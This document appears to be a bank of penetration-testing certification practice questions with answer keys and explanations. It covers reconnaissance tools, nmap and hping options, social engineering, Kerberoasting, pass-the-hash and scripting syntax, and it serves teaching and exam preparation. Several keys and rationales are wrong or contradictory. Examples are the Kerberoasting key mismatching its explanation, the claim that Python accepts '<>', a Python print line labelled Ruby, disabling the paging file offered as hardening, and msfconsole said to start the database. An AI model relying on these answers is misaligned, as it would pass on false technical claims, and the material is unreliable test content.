- C. Lock bypass is simply that: bypassing locks without picking them. In this scenario, the tester is attempting a physical security assessment with the use of an under-the-door tool, which goes underneath a door and pulls open a door handle from the inside.
You have been asked to perform a penetration test for a client. You need a document that will set the overall terms between the two organizations. This will also be used for future work between your organizations as you plan on setting up a support agreement. What is this document called?
A. Noncompete agreement
B. Nondisclosure agreement (NDA)
C. Master services agreement (MSA)
D. Statement of work (SOW)
- C. A master services agreement (MSA) sets the overall provisions between two organizations. Many organizations also create an MSA that defines the terms that the organizations will use for work to be done in the future. This makes ongoing engagements and contracts much easier to work through. This can help organizations prevent the need to renegotiate. MSAs are common when organizations anticipate working together over a period of time or when a support agreement is created.
Once the completion of testing is done for a client, the tester is prioritizing the findings and recommendations for an executive summary. Which one of the following considerations would be the most beneficial to the client?
A. The availability of patches and other remediations
B. The levels of difficulty to exploit the identified vulnerabilities
C. The risk tolerance of the client’s organization
D. The time it took to accomplish each step
- C. In this scenario, it would be important to put the risk tolerance of the client’s organization into the executive summary. Risk tolerance is basically how much risk an organization is willing to take on where their investments are concerned. With any type of investment, there is always risk, but how much risk one is able to withstand is their risk tolerance. This may be different for every organization. You cannot put a set value on risk tolerance.
During the discovery phase of a black box penetration test, you use the centralops.net website to perform reconnaissance on the target organization’s domain name. Partial results are shown here:
Which of the following are true? (Choose two.)
- The organization’s certificate expired in 2017.
- SHA1 was used to sign the organization’s certificate.
- The organization uses the Apache web server.
- SHA256 was used to sign the organization’s certificate.
- The organization’s web server runs on Windows.
- D and E. In this example, the organization’s SSL/TLS certificate was signed using the SHA256 cryptographic hash function. In addition, it can be seen that the organization uses the IIS web server, which runs on top of Windows Server.
Consider the following image:
Which OSINT tool was used to generate this output?
A. whois
B. Foca
C. Maltego
D. Censys
- A. This output was created by the whois utility. This OSINT tool is used to gather public information about the target organization’s domain.
Which forms of a cross-site scripting (XSS) attack are considered to be a server-side exploits? (Choose two.)
- Stored/persistent
- Reflected
- Document Object Model (DOM)
- Clickjacking
- Directory transversal
- A and B. Both the stored/persistent and reflected XSS exploits are considered server-side exploits because the malicious scripts are embedded on a server. When the user views the web page, the malicious scripts run, allowing the attacker to capture information or perform other actions.
Which option causes nmap to scan a specified number of random hosts?
A. -iL
B. -sS
C. -sR
D. -iR
- D. The –iR option causes nmap to scan a specified number of random hosts. For example, if you wanted to scan 50 random hosts, you would use the –iR 50 option with the nmap command.
A penetration tester is conducting a gray box penetration test. She notices that one of the branch offices of the organization uses a caching-only DNS server to handle name resolution requests. She sends a bogus reply to a name resolution request from the caching-only DNS server, using a spoofed source address in the reply packets. The bogus name resolution records point users to a fake web server that is used to harvest authentication credentials. What is this exploit called?
- DNS poisoning
- ARP poisoning
- DNS cache poisoning
- Man-in-the-middle
- C. This is also an example of DNS cache poisoning. Instead of poisoning the local DNS cache on workstations, the cache of the caching-only DNS server has been poisoned in this scenario. The poisoned records will remain in the cache until the TTL value is reached.
Which of the following exploits are facilitated by weaknesses in the SMB protocol? (Choose two.)
- Distributed denial of service (DDoS)
- Fraggle
- Teardrop
- EternalBlue
- WannaCry
- D and E. The EternalBlue and WannaCry exploits are facilitated by weaknesses in the SMB protocol. The EternalBlue exploit takes advantage of the fact that SMBv1 mishandles exploit packets, allowing attackers to remotely execute malicious code on the system running the SMB protocol. WannaCry is a form of ransomware that uses EternalBlue to gain access to vulnerable systems and install itself.
Which of the following Windows Group Policy settings should never be enabled?
A. Store passwords using reversible encryption
B. Password must meet complexity requirements
C. Minimum password length
D. Certificate path validation settings
E. Certificate services client – Auto-enrollment
- A. The “Store passwords using reversible encryption” policy is highly insecure. It is included in modern deployments to provide backward compatibility with older applications. A client who has this policy turned on should be advised of the security consequences and to consider upgrading to newer applications that don’t require it.
Consider the output from a command shown here:
Which OSINT utility was used to gather this information?
- whois
- nslookup
- nmap
- recon-ng
- host
- D. The recon-ng utility provides a web reconnaissance framework that allows you to conduct open source reconnaissance about an organization on the Web. In this example, all the public-facing servers associated with the domain name specified along with their IP addresses have been displayed.
Which of the following methods are commonly used to harden Windows-based computer systems? (Choose two.)
A. Install extra system RAM and then disable the Windows paging file.
B. Grant the Administrator user the “act as part of the operating system” right.
C. Disable unneeded services.
D. Allow anonymous access to the registry.
E. Disable automatic notification of patch availability.
- A and C. To harden a Windows-based computer system, you should consider installing extra system RAM and then disable the Windows paging file. This prevents sensitive data that is supposed to be stored only in unencrypted format in RAM from being written to the hard disk page file. You should also disable any unneeded services.
While reading an executable script file, you see a line near the beginning of the script that declares a variable using the following syntax:
$ServerName = FS1
Which type of script could this be? (Choose two.)
A. PowerShell
B. Bash
C. Ruby
D. Python
- A and C. When declaring a variable, PowerShell uses a syntax of $variable_name = value.
Ruby uses the same syntax when declaring a global variable.
Sue, in the finance department, receives an email from the president of the company indicating that a new vendor needs to be issued a wire transfer. However, neither Sue nor the president know who this new vendor is. The president claims that he never sent the email requesting the transfer. What type of motivation technique is the attacker attempting?
A. Principle of authority
B. Principle of fear
C. Principle of likeness
D. Principle of scarcity
E. Principle of social proof
- A. Social engineering targets people instead of computers and relies on individuals or groups breaking security procedures, policies, and rules. Social engineering can be done in person, over the phone, by text messages, or by email. In this scenario, the attacker is using the social engineering principle of authority. They were hoping that by Sue in finance receiving an email from the president of the company, there would be no questions asked and the transfer would take place. Authority follows the belief that people will tend to obey authority figures, even if they are asked to perform objectionable acts.
You are a penetration tester and looking at performing a Kerberoasting attack. Given the following situations, in which one would you perform a Kerberoasting attack?
- The tester compromised a Windows device and dumps the Local Security Authority (LSA) secrets.
- The tester needs to retrieve the Security Account Manager (SAM) database and crack the password hashes.
- The tester compromised a user account that has limited privileges and needs to target other accounts for lateral movement.
- The tester compromised an account and needs to dump hashes and plaintext passwords from the system.
- D. Kerberoasting is a technique that relies on requesting service tickets for service account service principal names (SPNs). The tickets are encrypted with the password of the service account associated with the SPN, meaning that once a tester has obtained the service tickets by using a tool like Mimikatz, the tester can crack the tickets to obtain the service account password using offline cracking tools. Kerberoasting is a four-step process:
- Scan Active Directory for user accounts with service principal names (SPNs) set.
- Request service tickets using the SPNs.
- Extract the service tickets from memory and save to a file.
- Conduct an offline brute-force attack against the passwords in the service tickets.
Which one of the following is an instance of a spear phishing attack?
- Targeting the CFO with an SMS attack
- Targeting the HR team with an email attack
- Targeting random users with a USB key drop
- Targeting an organization with a watering hole attack
- A. Phishing attacks target sensitive information such as passwords, usernames, or credit card information. Spear phishing is aimed at specific individuals rather than a broader group. SMS phishing (or smishing) is phishing via SMS messages. SMS stands for Short Message Service. It is a way to send and receive text messages or short emails with a cell phone. An SMS attack is an attempt to obtain personal information by tricking the individual with a text message or by getting them to go to a fake website and enter personal information. In this scenario, you want to target one particular individual rather than a group.
In terms of multifactor authentication, which of the following is an example of something you know?
A. PIN
B. One-time password (OTP)
C. Biometric scan
D. RSA token
- A. A PIN is an example of something you know.
You are the CIO for a mid-sized corporation. You are putting together a plan to implement regular penetration tests and are considering using an external penetration testing contractor. Which of the following are benefits of using an external team? (Choose two.)
A. They have contextual knowledge of the organization.
B. They are less biased than an internal team.
C. They have the independence required to perform a thorough test.
D. They are intimately familiar with the security controls within the organization.
E. It’s usually less expensive than using an internal team.
- B and C. External penetration testing teams are hired for the express purpose of performing penetration tests. Because they aren’t directly employed by the organization, they tend to have a higher degree of independence. They don’t have to worry about upsetting a manager or director if vulnerabilities are discovered. In fact, they usually delight in such an event. Also, they tend to be less biased because they don’t participate in the design or ongoing maintenance of the organization’s network infrastructure.
During a penetration test, the client organization’s network administrator discovers a teardrop attack underway that is aimed at the company’s perimeter router. The administrator calls the penetration tester to see whether the attack is part of the penetration test. What is this communication path called?
A. Situational awareness
B. Metrics and measures
C. De-confliction
D. Normalization of data
- C. The term de-confliction refers to the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is coming from an authorized penetration tester or whether it is a real attack instigated by some third-party hacker.
While reading an executable script file, you see a line near the beginning of the script that declares a variable using the following syntax:
ServerName = FS1
Which type of script could this be? (Choose two.)
A. PowerShell
B. Bash
C. Ruby
D. Python
- B and D. When declaring a variable, both Bash and Python use the same syntax: variable_name = value.
You are a penetration tester, and you are conducting a test for a new client. You managed to obtain access to a laptop computer. What should your next step be to obtain credentials from the laptop computer?
A. Use brute force to obtain the user’s password.
B. Conduct a LLMNR/NETBIOS-NS query.
C. Leverage the BeEF framework to capture credentials.
D. Perform an ARP spoofing poisoning.
- B. Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NetBIOS-NS) poisoning can provide penetration testers with the ability to obtain a man-in-the-middle position, broadening their ability to gain access and information. One of the most commonly targeted services in a Windows network is NetBIOS. NetBIOS is commonly used for file sharing.
As you are conducting a penetration test for a client, you want to make sure the post-engagement cleanup process goes smoothly. What should you do to accomplish this?
A. Carefully document everything you do as you conduct the test.
B. Create back doors in critical systems so you can easily access them later.
C. Create images of all systems and devices so they can be restored to their pre-test state.
D. Erase any log entries created by your exploits.
- A. After a penetration test, it is critical that you undo everything you have done. The best way to accomplish this is to carefully document everything you do as you conduct the test. That way, you will have a record of what must be restored and how it should look after the cleanup is complete.
You are a penetration tester and have been scanning a new client’s network. The vulnerability scanner that you are utilizing is using a service access level to better evaluate vulnerabilities across multiple assets within an organization. What type of scan is being performed?
A. A credentialed scan
B. A nonintrusive scan
C. A passive scan
D. A privilege escalation scan
- A. Credentialed scans are scans in which the scanning computer has an account on the computer being scanned that allows the scanner to do a more thorough check looking for problems that may not be seen from the network. Credentialed scans are widely used in enterprise vulnerability management programs and are a useful tool when performing a penetration test. Credentialed scans may access operating systems, databases, and applications. Credentialed scans typically only retrieve information from target servers and do not make changes to the server itself.
As a part of a gray box penetration test, you need to create a PowerShell script to run an exploit against the target organization. As a part of the script, you need to insert a value of FS1 into an element named HostName within an associative array named Target. Which of the following lines of code will do this?
A. Target[HostName] = FS1
B. Target = [{“HostName”:”FS1”}]
C. $Target.HostName = ‘FS1’
D. _Target = {“HostName” => “FS1”}
- C. When creating an associative array in a PowerShell script, you use the following syntax: $array_name.element_name = “value” .
In this example, the line $Target.HostName = ‘FS1’ assigns a value of FS1 to the element named HostName within the Target array.
You are a penetration tester, and you are looking to cross-compile code for your penetration activity. Then you plan to deploy it. Why would you cross-compile code?
- To add additional libraries
- To allow you to inspect the source code
- To run it on multiple platforms
- To run it on different architectures
- D. Cross-compiling code is used when a target platform is on a different architecture. The tester may not have access to a compiler on the target machine or may need to compile the code for an exploit from the primary workstation, which is not the same architecture as the target.
You are documenting the rules of engagement (ROE) for an upcoming penetration test. Which elements should be considered? (Choose two.)
A. A list of IP addresses assigned to the systems you will use to conduct the test
B. How you will communicate the results of the test with the target
C. A list of penetration testing tools you will use during the test
D. A list of references from past clients for whom you have conducted penetration tests
E. A list of behaviors that are not allowed on the part of the target during the test
- B and E. The ROE should specify when and how communications will occur between you and the client. Should you provide daily or weekly updates, or will you simply report when the test is complete? The ROE should also specify the behaviors allowed on the part of the target. For example, engaging in defensive behaviors such as shunning or blacklisting could limit the value of the test.
You are performing a gray box penetration test. To capture information from multiple VLANs, you have configured the network board in your computer to emulate a trunk port on a network switch. Your goal is to get the real switch to forward traffic from all VLANs to your device. What is this exploit called?
- MAC address spoofing
- Double-tagging
- Switch spoofing
- Evil twin
- C. This is an example of a switch spoofing exploit that is used for VLAN hopping. In a switch spoofing exploit, the tester’s network board is reconfigured to emulate a trunk port on a network switch. By doing this, the real switch will think it needs to forward traffic from all VLANs to the tester’s device.
Which Windows Group Policy setting determines how much time must pass after a failed logon attempt before the failed logon attempt counter is reset to 0?
A. Account lockout duration
B. Account lockout threshold
C. Reset account lockout counter after
D. Store passwords using reversible encryption
- C. The “Reset account lockout counter after” Group Policy setting determines how much time must pass after a failed logon attempt before the failed logon attempt counter is reset to 0. This policy setting helps prevent brute-force attacks by significantly increasing the amount of time required to conduct the attack.
While waiting in line at a food truck behind an employee of the target organization, a penetration tester steals her access badge and makes a copy of its RFID signature on a fake access badge. What is this technique called?
- Egress sensor bypass
- Lock bypass
- Badge cloning
- Fence jumping
- C. Badge cloning occurs when an attacker makes a copy of a valid access badge in order to enter a facility. By copying a valid badge’s RFID signature, the penetration tester in this scenario can use the fake badge to access the target organization’s facility using the authorized employee’s credentials.
You are a penetration tester, and you are conducting a test for a new client. You want to deploy a malicious website as part of the test to exploit the browsers belonging to the client’s employees. What tool can the test utilize?
A. Browser Exploitation Framework (BeEF)
B. Metasploit
C. Open Web Application Security Project (OWASP)
D. Social Engineer Toolkit (SET)
- A. The Browser Exploitation Framework (BeEF) is designed for this type of attack. BeEF provides an automated toolkit for using social engineering to take over a client’s web browser. You can then use various phishing and social engineering techniques to get employees to visit the site.
As a part of a penetration test, you need to gather user account names and passwords from the passwd and shadow files from a Linux server. Which utilities could you use to do this? (Choose two.)
A. John the Ripper
B. Cain and Abel
C. Kismet
D. Censys
E. Recon-ng
- A and B. John the Ripper as well as Cain and Abel can be used to crack passwords from an offline database of user accounts, such as the shadow and passwd files from a Linux system.
As a part of a gray box penetration test, you need to create a Python script to run an exploit against the target organization. As a part of the script, you need to make a comparison between two variables that tests whether they are not equal. Which relational operators could you use? (Choose two.)
A. <>
B. ==
C. -eq
D. !=
E. -ne
- A and D. When making a comparison between two values in a Python script to see whether they are not equal, you can use either the <> or the != relational operator.
You are a penetration tester, and you are planning on using black box penetration testing on a new client. Using this type of strategy, what will you be provided with?
A. Privileged credentials
B. A network diagram
C. Source code
D. Nothing, as you must do your own discovery
- D. Black box tests, sometimes called zero knowledge tests, are intended to replicate what an outside attacker would encounter. Testers are not provided with access to or information about an environment, and instead, they must gather information, discover vulnerabilities, and make their way through an infrastructure or systems as an attacker would.
You have just concluded a penetration test for a client. In your findings, you note that all of the Windows desktop systems in the organization have the same password assigned to the local Administrator user account. What could you recommend to remediate this problem?
A. Encrypt the passwords.
B. Implement password complexity requirements.
C. Implement intruder lockout.
D. Randomize the local Administrator credentials.
- D. Of the options presented here, the best recommendation to remediate shared local administrator credentials would be to simply randomize those credentials. Otherwise, compromising the local administrator password on one desktop would expose all the other desktops in the organization.
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to scan all of the ports on a network host with an IP address of 192.168.1.2. Which command should you use to do this?
A. nmap 192.168.1.2 -p-
B. nmap 192.168.1.2 –p all
C. nmap 192.168.1.2 –s all
D. nmap 192.168.1.2 –p 1-1024
- A. The nmap 192.168.1.2 -p- command causes the nmap utility to scan all ports on the specified host. Be aware that the scan will take some time to complete because of the number of ports involved.
Which of the following Windows features can be used to remotely manage Windows systems over a network connection? (Choose two.)
- SMB
- Telnet
- PS Remoting
- WinRM
- SSH
- C and D. PowerShell (PS) Remoting allows you to run PowerShell cmdlets remotely on other Windows systems in your network environment. Windows Remote Management (WinRM) is a system that allows Windows administrators to manage remote systems using the WS Management protocol.
Which motivation factor gets people to act because they believe that “everyone else is doing it”?
- Social proof
- Fear
- Scarcity
- Authority
- A. People can be motivated to act if they think that everyone else is doing the same thing. This is called social proof. The (flawed) assumption is that if everyone else is doing something, it must be the right thing to do.
Which of the following threat actors typically lacks the technical expertise to develop their own exploits and must rely on prewritten code downloaded from the Internet?
A. Organized crime
B. Hacktivist
C. Script kiddie
D. Nation-state actor
- C. A script kiddie usually lacks the technical sophistication to mount an attack using their own tools. Instead, they typically download existing tools and run them. Because these tools are already known to the cybersecurity community, script kiddies generally pose less of a threat than the other types of actors in the adversary tier list.
You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Filtered. What does this likely mean?
A. The Telnet service is installed but not running.
B. The Telnet service is not installed.
C. The Telnet service is not installed, and a different service is using its default port.
D. The Telnet service is installed and running, but a host firewall is blocking it.
- D. When nmap indicates a port is filtered, it usually means the associated service is installed and running, but a host firewall is blocking the port.
Which type of vulnerability scan sends SYN packets to network hosts to enumerate them?
- Discovery
- Full
- Stealth
- Compliance
- C. A stealth scan enumerates hosts on the target network by sending them a SYN packet. If a SYN-ACK is received, then the scanner knows that the destination host exists. The SYN-ACK also contains a limited amount of information about the host that can be captured and analyzed by the scanner.
Which of the following best describe a trusted agent during a penetration test?
A. A tester who secretly penetrates the target organization by applying for a job there
B. An individual within the target organization who has a direct line of communication with the penetration tester
C. An individual on the penetration testing team who has a direct line of communication with the IT staff of the target organization
D. A representative of the local law enforcement agency who has been briefed about the test by the penetration tester
- B. The term trusted agent refers to an individual within the target organization, typically an IT administrator or a manager, who has a direct line of communication with the penetration tester. This individual is usually responsible for de-confliction and de-escalation communications between the client and the tester.
You need to create a Python script that will prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost?
A. TargetHost = input(‘Please enter a hostname:’)
B. read TargetHost
C. TargetHost = gets
D. $TargetHost = read-host -Prompt
- A. Adding the TargetHost = input(‘Please enter a hostname:’) line to a Python script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.
You have just concluded a penetration test for a client that uses a large number of temporary workers and contractors. In your findings, you report that temporary and contract user accounts are frequently not deactivated or removed when their works is complete. Given that the client user Linux desktops and servers, which of the following Linux commands should you recommend they use to automatically lock user accounts after a certain time?
A. chage
B. chmod
C. chgroup
D. chown
- A. The chage command can be used on Linux systems to automatically lock user accounts after a certain time. This prevents stale user accounts from being used by an attacker or disgruntled former employee to gain unauthorized access.
Which security misconfiguration on a web server would allow an end user accessing the site with a web browser to navigate through the web server’s file system?
- Directory transversal
- Cookie manipulation
- File inclusion
- Weak credentials
- A. If the directory transversal has been allowed in the web server’s configuration, then it could potentially expose the file system of the web server to users accessing the site in a web browser, including directories outside of the web server’s root directory. For example, the Apache web server can be run in a chroot jail to prevent users from accessing directories outside of the web server’s directories.
You are a penetration tester, and you are conducting a test for a new client. You and the client are having a discussion regarding race condition exploitation. Which of the following is an example of race condition?
A. Cross-site request forgery (XSRF)
B. Hard-coded credentials
C. SQL injection (SQLi)
D. Time of check to time of use (TOCTTOU)
- D. Race conditions occur when the security of a code segment depends upon the sequence of events occurring within the system. The time-of-check-to-time-of-use (TOCTTOU) issue is a race condition that occurs when a program checks access permissions too far in advance of a resource request.
Which social engineering technique is least likely to be used during a penetration test?
- Interrogation
- Impersonation
- Shoulder surfing
- USB key drop
- A. Interrogation involves questioning an employee of the target organization, using fear as a motivation to gather information. Interrogation is not a technique that is typically used by penetration testers because it would likely result in criminal charges against the tester as well as civil litigation.
While performing a gray-box penetration test, the tester discovers that several Linux workstations in the network have not been joined to the organization’s Active Directory domain, even though they have the Samba service installed. To access shared folders on Windows servers, these workstations use NT LAN Manager (NTLM) connections. The tester captures hashed user credentials as they are passed between workstations and servers and then reuses them later to establish new authenticated sessions with the file servers. What is this exploit called?
- ARP poisoning
- Fraggle attack
- NAC bypass
- Pass the hash
- D. This is an example of a pass-the-hash exploit. In this exploit, the tester captures hashed NTLM user credentials and then reuses them to authenticate at a later point in time to a Windows system. Because NTLM authentication uses hashed credentials, the tester doesn’t need to know the victim’s actual username and password. The hashed credentials are sufficient to create a new authenticated session.
Consider the following snippet from a script:
if test -f $FileName; then
echo “The file exists.”
else
echo “The file does not exist.”
Fi
What scripting language is this snippet written in?
A. Ruby
B. PowerShell
C. Bash
D. Python
- C. An if/then flow control structure in Bash uses the following syntax:
- if condition then
- commands…
- else
- commands…
- fi
You are a penetration tester, and you are conducting a test for a new client. You want to do a search to see your client’s computers and devices that are connected to the Internet. You want to be able to use a variety of filters. What tool can you use to accomplish this?
A. Censys
B. Shodan
C. TheHarvester
D. Whois
- B. Shodan is a popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. Shodan is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends back to the client. Using Shodan for penetration testing requires some basic knowledge of banners including HTTP status codes.
A help desk technician receives a phone call from someone claiming to be an employee. This person has been locked out of an account and is requesting assistance to unlock it. The help desk asks for proof of identity before access will be granted. What type of attack was the caller trying to perform?
- Impersonation
- Interrogation
- Phishing
- Shoulder surfing
- A. Impersonation involves disguising oneself as another person to gain access to facilities or resources. This may be as simple as claiming to be a staff member or as intricate as wearing a uniform and presenting a fake company ID. In this scenario, the attacker called the help desk technician pretending to be an employee.
You are performing a black box penetration test for a medium-sized manufacturing organization. Using reconnaissance techniques, you have identified the vendor that services the printers within the organization’s headquarters. You dress in a similar uniform as that vendor’s employees. You also purchase a toolkit containing tools commonly used by printer repair technicians. The receptionist of the target organization allows you to enter and directs you to a troublesome printer. While “working” within the organization, you discretely watch employees as they type, trying to gather sensitive information. Which exploits did you use in this scenario? (Choose two.)
- Shoulder surfing
- Phishing
- Impersonation
- Interrogation
- Elicitation
- A and C. Impersonation is a social engineering technique that can be used by a penetration tester to gain physical access to the target’s facility. In this scenario, the receptionist allowed the tester to access the organization’s facility because the tester appears to be from a trusted vendor. The tester also used shoulder-surfing techniques to gather sensitive information from employees.
Which of the following is a type of malware that provides a useful function but secretly performs malicious actions when it is run?
- Backdoor
- Trojan
- Daemon
- Worm
- B. A Trojan is a type of malware that provides a useful function but secretly performs malicious actions when it is run. For example, it may provide an entertaining game that the user enjoys playing. However, in the background, it could be running a keylogger, creating a backdoor, or even making the system a zombie in a botnet.
You need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost?
A. echo $TargetHost
B. read TargetHost
C. readln TargetHost
D. input $TargetHost
- B. Adding the read TargetHost line to a Bash script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.
You are performing a black box penetration test for a medium-sized organization that sells imported motorcycles and ATVs through its online storefront. You need to discover who owns the organization’s domain. Which tool in your penetration testing toolkit should you use?
A. nslookup
B. whois
C. Shodan
D. Maltego
- B. The whois command can be used to gather information from public records about who owns a particular domain.
You are meeting with your client after a penetration test is complete. During the meeting, you provide the client with detailed evidence related to the issues you discovered during the test. What is this process called?
A. Attestation of findings
B. Lessons learned
C. Client acceptance
D. Normalization of data
- A. After a penetration test, it is critical that you communicate what happened and what was discovered to the client. During the attestation of findings process, you communicate detailed evidence of what you discovered to the client. The client can then use this information to remediate the problems found.
Which wireless exploit is more of a stress test designed to prevent users from being able to use a wireless network?
- Karma attack
- Deauth attack
- Downgrade attack
- Jamming attack
- D. In a jamming attack, the penetration tester transmits a radio signal in the 2.4 GHz and/or 5 GHz frequency ranges that is powerful enough to disrupt the legitimate wireless signal. This disruption prevents users from using the wireless network. As such, this exploit can be classified as a network stress test or denial-of-service attack.
Which of the following techniques can be used to help retain persistence for an exploit on a Windows system? (Choose two.)
- Using scheduled tasks
- Using cold boot attacks
- Implementing Kerberoasting
- Using DLL hijacking
- Looking for kernel exploits
- A and D. DLL hijacking and scheduled tasks can both help retain persistence for an exploit on a Windows system. DLL hijacking causes the exploit contained in the malicious DLL to be loaded every time a linked application is started. Using scheduled tasks ensures that an exploit is run on a regular basis.
An attacker who is a passionate advocate for brine shrimp attacks and defaces the website of a company that harvests brine shrimp and sells them as fish food. What type of attacker is this?
A. Script kiddie
B. Hacktivist
C. Organized crime
D. Nation-state
- B. A hacktivist’s attacks are usually politically motivated, instead of financially motivated. Typically, they want to expose perceived corruption or gain attention for their cause. A script kiddie is an individual who carries out an attack using code written by more advanced hackers. An organized crime threat actor is a group of cybercriminals whose main goal is financial gain. A nation-state threat actor acts on behalf of a nation to inflict harm on a rival nation.
A penetration tester is testing the penetration of a client’s network and managed to obtain access to a laptop. What would be the tester’s next step to obtain credentials from the laptop?
- Brute force the user’s password.
- Conduct a LLMNR/NETBIOS-NS query.
- Leverage the BeEF framework to capture credentials.
- Perform an ARP spoofing poisoning.
- B. Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NetBIOS-NS) poisoning can provide penetration testers with the ability to obtain a man-in-the-middle position, broadening their ability to gain access and information. One of the most commonly targeted services in a Windows network is NetBIOS. NetBIOS is commonly used for file sharing.
A penetration tester observes that many employees of the target organization congregate outside the back door of the facility at 10 a.m. and 2 p.m. to smoke cigarettes. The next day, the tester joins the group and pretends to smoke with them. When the group finishes smoking, the tester walks through the back door behind the group. What is this technique called?
- Piggybacking
- Tailgating
- Lock bypass
- Badge cloning
- A. Piggybacking occurs when an intruder tags along with one or more an authorized people through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person’s knowledge or consent.
You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Open. What does this mean?
A. The Telnet service is installed but not running.
B. The Telnet service is installed, running, and accessible.
C. The Telnet service is not installed, and a different service is using its default port.
D. The Telnet service is not installed.
- B. When nmap indicates a port is open, it usually means the associated service is installed, is running, and is accessible through the host firewall.
You are a penetration tester, and you’ve been asked to determine whether the client’s server farm is compliant with the company’s software baseline. You will be conducting a remote scan. What type of scan should you perform to verify compliance?
A. A credentialed scan
B. A discovery scan
C. A full scan
D. A stealth scan
- B. A discovery scan identifies the operating systems that are running on a network, maps those systems to IP addresses, and enumerates the open ports and services on those systems. Discovery scans provide penetration testers with an automated way to identify hosts that exist on the network and build an asset inventory.
You are defining the rules of engagement (ROE) for an upcoming penetration test. This will be a gray box assessment. This will be an internal test. What limitations might you expect to encounter as you conduct the assessment? (Choose two.)
A. You will have limited network access.
B. You will experience pushback from the internal IT staff.
C. You will have limited storage access.
D. You will not be allowed to enter the organization’s facility.
E. You will not be allowed to run vulnerability scans in the organization’s network infrastructure devices, such as servers, routers, and switches.
- A and C. Because this is a gray box test, you can expect to have limited network access and limited storage access. Essentially, you can expect to have a level of knowledge and access similar to what the average employee within the organization would have.
You are a penetration tester, and you are conducting a test on a specific client database server. You want to detect any vulnerabilities on the database server. Which tool will best assist you?
A. Nessus
B. Nikto
C. Sqlmap
D. OpenVAS
- C. Sqlmap is an open source tool used to automate SQL injection attacks against web applications with database back ends. Sqlmap is a commonly used open source database vulnerability scanner that allows security administrators to probe web applications for database vulnerabilities. For this scenario, Sqlmap is a dedicated database vulnerability scanner and is the most appropriate tool.
A web application has been developed to target browsers and permit access into different banking accounts. This application takes a few dollars from one account and sends it to a foreign account. What type of attack has just occurred?
- Cross-site scripting
- Flash cookie exploitation
- Header manipulation
- SQL injection
- A. In a cross-site scripting (XSS) attack, an attacker embeds scripting commands on a website that will later be executed by an unsuspecting visitor accessing the site. The idea is to trick a user visiting a trusted site into executing malicious code placed there by an untrusted third party. In this scenario, the attacker has developed an application that will target web browsers and permit access to a user’s banking information in the process, stealing money and transferring it to another account.
Which command in a Python script will cause it to write the value of a variable named TargetHost on the screen?
A. echo $TargetHost
B. print (TargetHost)
C. writeln TargetHost
D. puts TargetHost
- B. Adding the print (TargetHost) line to a Ruby script causes it to display the value of a variable named TargetHost on the screen.
Which open source research source is maintained by the Japanese government and provides a dynamic summary of current security alerts and advisories?
- CERT
- JPCERT
- CWE
- CAPEC
- B. JPCERT is the Japanese government’s version of the U.S. government’s Computer Emergency Response Team (CERT). JPCERT maintains a website at https://www .jpcert.or.jp/english/ that provides a dynamic summary of current security alerts and advisories.
You are a penetration tester, and you are conducting a test for a new client. You want to use Metasploit. Which command will start the Metasploit database?
A. db_connect
B. db_init
C. msfconsole
D. msfvenom
- C. Metasploit is launched by running msfconsole from the command line. MSFconsole is located in the /usr/share/metasploit framework/msfconsole directory.
You are a penetration tester, and you are conducting a test for a new client. You have just about completed the testing, and you want to make sure that the post-engagement cleanup process has no issues. What should you do throughout the testing phase to make sure that the post-engagement goes effortlessly?
A. You should create backdoors so you can access them later.
B. You should carefully record everything you’ve done during the testing.
C. You should erase any log entries that you created during your exploitation.
D. You should create images of all systems and devices so you can restore them to their pre-test state.
- B. After a penetration test, it is imperative that you undo everything you have done to your client’s network. The best way to do this is by carefully documenting everything you’ve done while conducting the testing. That way, you don’t accidentally forget something.
You and a colleague are discussing the different multifactor authentication categories. One example may be that an employee is using a key fob that has authentication tokens that generate a one-time password that must be used at login. What multifactor authentication category would this scenario fall under?
A. Something you are
B. Something you have
C. Something you know
D. Something you need
- B. In this scenario, you and your colleague are discussing something you have. Physical objects may be used as authentication mechanisms. Organizations seeking to protect sensitive information and critical resources should implement multifactor authentication. Multifactor authentication implementations combine two or more authentication mechanisms coming from different authentication categories. The authentication categories are something you know, something you have, and something you are.
You are a penetration tester, and you are conducting a test for a new client. You plan on using an hping command to send traffic to a remote system. What type of traffic will the remote system see if you use the script hping remoteclient.com -S -V -p 80?
A. HTTP traffic to TCP port 80
B. HTTPS traffic to TCP port 80
C. TCP SYNs to TCP port 80
D. TCP three-way handshake to TCP port 80
- C. Hping is a command-line tool that allows testers to generate network traffic. Hping is popular because it allows you to create custom packets. In this scenario, you will be sending TCP SYNs to TCP port 80. The -S switch asks hping to send SYN traffic, the -V switch is verbose mode, and the -p switch indicates the port.
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a TCP ACK scan of this host. Which command should you use to do this?
A. nmap 192.168.1.1 –sA
B. nmap 192.168.1.1 –T1
C. nmap 192.168.1.1 -sT
D. nmap 192.168.1.1 -ACK
- A. The nmap 192.168.1.1 -sA command causes the nmap utility to conduct a TCP ACK scan of the specified target system.
You are scoping a white box penetration test for a client. The goal is to see whether you can gain access to confidential customer data stored on an internal database server. You have asked the client for architectural diagrams. Which information should the client provide you with? (Choose two.)
A. Swagger document
B. Simple Object Access Protocol (SOAP) documentation
C. Network diagrams
D. XSD
E. Facility maps
- C and E. When requesting internal architectural diagrams as a part of a white box test, you should typically be supplied with documentation such as network diagrams and facility maps. You can use this information to map out the network topology and locate key infrastructure devices, such as switches, routers, and servers.
